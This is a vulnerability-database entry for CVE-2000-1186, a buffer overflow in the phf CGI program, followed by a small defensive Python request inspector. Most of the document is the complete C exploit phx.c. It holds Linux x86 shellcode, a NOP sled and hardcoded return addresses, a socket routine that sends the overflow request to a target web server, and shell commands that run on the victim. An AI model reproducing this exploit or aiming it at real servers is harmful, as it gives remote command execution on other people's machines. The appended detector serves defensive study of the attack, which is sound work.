phf CGI program buffer overflow vulnerability


Vulnerability ID: 1106110    Type: buffer overflow
Published: 2000-12-01    Updated: 2001-01-09
CVE ID: CVE-2000-1186
CNNVD ID: CNNVD-200101-060
Platform: CGI    CVSS score: 7.5
|Sources
https://www.exploit-db.com/exploits/211
https://www.securityfocus.com/bid/88468
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200101-060
|Details
The phf CGI program contains a buffer overflow. A remote attacker can execute arbitrary commands by supplying a large number of parameters together with an overlong MIME header.
|Exploit
/*
 |  phx.c -- phf buffer overflow exploit for Linux-ix86
 |  Copyright (c) 2000 by proton. All rights reserved.
 |
 |  This program is free software; you can redistribute it and/or modify
 |  it under the terms of the GNU General Public License as published by
 |  the Free Software Foundation; either version 2 of the License, or
 |  (at your option) any later version.
 |
 |  This program is distributed in the hope that it will be useful,
 |  but WITHOUT ANY WARRANTY; without even the implied warranty of
 |  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 |  GNU General Public License for more details.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>

char    tmp[8192];          /* buffer for the server's reply */
char    *host;
char    *progname;

/* write a string constant to stdout; sizeof-1 drops the terminating NUL */
#define output(x) write(1,x,sizeof(x)-1)

/*
 *  The whole HTTP request is the payload: the flood of empty `&'
 *  parameters overruns phf's argument buffer up to the saved return
 *  address, and the `X:' header is exported to the CGI as HTTP_X,
 *  which is where the NOP sled and the shellcode live.
 */
unsigned char shellcode[] =
  "GET /cgi-bin/phf?&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&"
  /*
   *  2 pointers, in case of -fomit-frame-pointer
   */
  "\x37\xfc\xff\xbf"
  "\x37\xfc\xff\xbf"
  " HTTP/1.0\n"
  /*
   *  set environment var `HTTP_X'
   */
  "X: "
  /*
   *  a bundle of AAA's, they're just as good as NOP's
   *  but is a tad bit more readable to humans.
   *  512 no-op instructions gives us a nice phat
   *  strike-zone for the above 2 pointers.
   */
  "7777777777777777777777777777777777777777777777777777777777777777"
  "7777777777777777777777777777777777777777777777777777777777777777"
  "7777777777777777777777777777777777777777777777777777777777777777"
  "7777777777777777777777777777777777777777777777777777777777777777"
  "7777777777777777777777777777777777777777777777777777777777777777"
  "7777777777777777777777777777777777777777777777777777777777777777"
  "7777777777777777777777777777777777777777777777777777777777777777"
  "7777777777777777777777777777777777777777777777777777777777777777"
  /*
   *  exploit code
   */
  "\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"
  "\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"
  "\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
  "\x41\x41"
  /*
   *  try to make sense to the webserver
   */
  "/bin/sh -c echo 'Content-Type: text/plain';echo '';"
  /*
   *  execute something funny!
   */
  "echo Hello! I am running as \"`whoami`\" on a `arch` cpu;"
  "echo Local time is `date` and there are `who|wc -l` users logged in.;"
  "echo '';"
  /*
   *  shellcode will terminate command at the `@'
   */
  "@\n\n"
  ;

/* resolve `host', connect to TCP port 80 and hand back the socket */
void netpipe(int *rsock, int *wsock)
{
  struct  sockaddr_in sai;
  struct  hostent *he;
  int     s;

  if (!host || !*host)
  {
    printf("Usage: %s <host>\n",progname);
    exit(1);
  }
  he = gethostbyname(host);
  if (!he)
  {
    printf("%s: Unknown host\n",host);
    exit(1);
  }

  s = socket(AF_INET,SOCK_STREAM,0);
  if (s < 0)
  {
    perror("socket");
    exit(1);
  }
  memset(&sai,0,sizeof(sai));
  sai.sin_family = AF_INET;
  sai.sin_port = htons(80);
  memcpy(&sai.sin_addr,he->h_addr_list[0],sizeof(struct in_addr));

  if (connect(s,(struct sockaddr*)&sai,sizeof(sai)) < 0)
  {
    switch(errno)
    {
    case ECONNREFUSED:
      output("Connection refused.\n");
      break;
    case ETIMEDOUT:
      output("Connection timed out.\n");
      break;
    case ENETUNREACH:
      output("Network unreachable.\n");
      break;
    default:
      output("Unknown error.\n");
      break;
    }
    exit(1);
  }
  *rsock = *wsock = s;      /* one TCP socket serves both directions */
}

int main(int argc, char **argv)
{
  char    *q,*cp;
  int     in,out;
  int     sz,x;

  progname = argv[0];
  host = (argc > 1) ? argv[1] : NULL;

  netpipe(&in,&out);
  /* send the request; sizeof-1 leaves out the literal's terminating NUL */
  write(out,shellcode,sizeof(shellcode)-1);
  output("\nCome to papa!\n\n");

  /*
   *  Relay the reply line by line: read into tmp, print every complete
   *  line, and keep the unfinished tail at the front for the next read.
   */
  x = 0;
  for(;;)
  {
    sz = read(in,&tmp[x],512-x);
    if (sz < 1)
      break;
    x += sz;
    q = cp = tmp;
    for(sz=x;sz;)
    {
      if (*q == '\n')
      {
        write(1,cp,(q-cp)+1);
        cp = q + 1;
      }
      q++;
      sz--;
    }
    if (cp != tmp)
    {
      sz = x - (cp - tmp);
      memmove(tmp,cp,sz);   /* source and destination overlap, so memmove, not memcpy */
      x = sz;
    }
  }
  exit(0);
}


// milw0rm.com [2000-12-01]
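As an added example (not part of this advisory or of phx.c), a small request inspector that flags the three traits a phx.c-style request has before it reaches phf: a flood of empty `&` parameters, non-printable bytes in the request line, and an oversized or binary `X:` header. The thresholds and both sample requests are constructed assumptions, not values from the advisory.

```python
import re
from dataclasses import dataclass

# Thresholds are assumptions chosen from the shape of phx.c, not values from the advisory.
EMPTY_PARAM_LIMIT = 16     # phx.c floods the query with dozens of empty "&" parameters
HEADER_VALUE_LIMIT = 256   # phx.c parks ~600 bytes of sled plus shellcode in an "X:" header
PRINTABLE = re.compile(rb"[\x20-\x7e\t]*")

@dataclass
class Finding:
    rule: str
    detail: str

def _split_request(raw: bytes):
    """Return (request line, header lines) of a raw HTTP/1.0 request, tolerating bare LF."""
    head = raw.split(b"\r\n\r\n", 1)[0].split(b"\n\n", 1)[0]
    lines = [l.rstrip(b"\r") for l in head.split(b"\n")]
    return lines[0], lines[1:]

def analyze_phf_request(raw: bytes) -> list:
    """Flag a /cgi-bin/phf request whose shape matches the CVE-2000-1186 trigger."""
    findings = []
    request_line, header_lines = _split_request(raw)
    parts = request_line.split(b" ")
    path, _, query = (parts[1] if len(parts) > 1 else b"").partition(b"?")
    if not path.endswith(b"/phf"):
        return findings                      # only phf is in scope for this rule set
    if not PRINTABLE.fullmatch(request_line):
        findings.append(Finding("binary-in-request-line", "non-printable bytes in the URL (return address in the query)"))
    empty = sum(1 for p in query.split(b"&") if p == b"")
    if empty >= EMPTY_PARAM_LIMIT:
        findings.append(Finding("argument-flood", f"{empty} empty parameters in the query string"))
    for line in header_lines:
        name, _, value = line.partition(b":")
        label, value = name.decode("ascii", errors="replace"), value.strip()
        if len(value) > HEADER_VALUE_LIMIT:
            findings.append(Finding("oversized-header", f"{label} header is {len(value)} bytes"))
        if not PRINTABLE.fullmatch(value):
            findings.append(Finding("binary-in-header", f"{label} header carries non-printable bytes"))
    return findings

# Constructed sample requests (not captured traffic): a normal phf lookup and one shaped like phx.c's payload.
BENIGN = b"GET /cgi-bin/phf?Qalias=smith HTTP/1.0\r\nHost: www.example.test\r\n\r\n"
ATTACK = (b"GET /cgi-bin/phf?" + b"&" * 64 + b"\x37\xfc\xff\xbf" * 2 + b" HTTP/1.0\n"
          + b"X: " + b"7" * 512 + b"\xcc\xcc\xcc\xcc" + b"/bin/sh -c echo hi@\n\n")

if __name__ == "__main__":
    for tag, req in (("benign", BENIGN), ("attack", ATTACK)):
        print(tag, [(f.rule, f.detail) for f in analyze_phf_request(req)])
```

The checks are deliberately independent, so a request that trips only one of them (for instance an oversized header on its own) still surfaces, and a non-phf request is ignored entirely.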
|Affected products
Vendor: Phf; product: Phf; version: 0
|References

Source: BUGTRAQ
Name: 20001115 Exploit: phf buffer overflow (CGI)
Link: http://archives.neohapsis.com/archives/bugtraq/2000-11/0221.html
Source: XF
Name: phf-cgi-bo(5970)
Link: http://xforce.iss.net/static/5970.php
